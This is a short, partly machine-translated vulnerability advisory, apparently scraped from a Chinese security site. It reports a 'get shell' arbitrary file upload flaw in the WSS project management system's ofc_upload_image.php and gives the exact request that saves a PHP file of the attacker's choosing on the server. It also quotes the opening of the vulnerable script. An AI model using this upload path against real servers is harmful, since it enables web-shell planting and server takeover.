The WSS project management system Post get shell-vulnerability warning-the black bar safety net

2013-02-21T00:00:00
ID MYHACK58:62201337428
Type myhack58
Reporter 佚名
Modified 2013-02-21T00:00:00

Description

The POST data

Vulnerability file to execute arbitrary suffix of the file to save

漏洞 文件 /chart/php-ofc-library/ofc_upload_image.php

Use:

/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php file name

Post any data

保存 位置 http://localhost/chart/tmp-upload-images/hfy.php

!

!

The latest version of wss vulnerability file, even the pay version is also available in the new store deployment of the demo~

<? php

//

// In the Open Flash Chart -> save_image debug mode, you

// will see the 'echo' text in a new window.

//

/*

print_r( $_GET );

print_r( $_POST );

print_r( $_FILES );

print_r( $GLOBALS );

print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );

*/

[1] [2] [3] next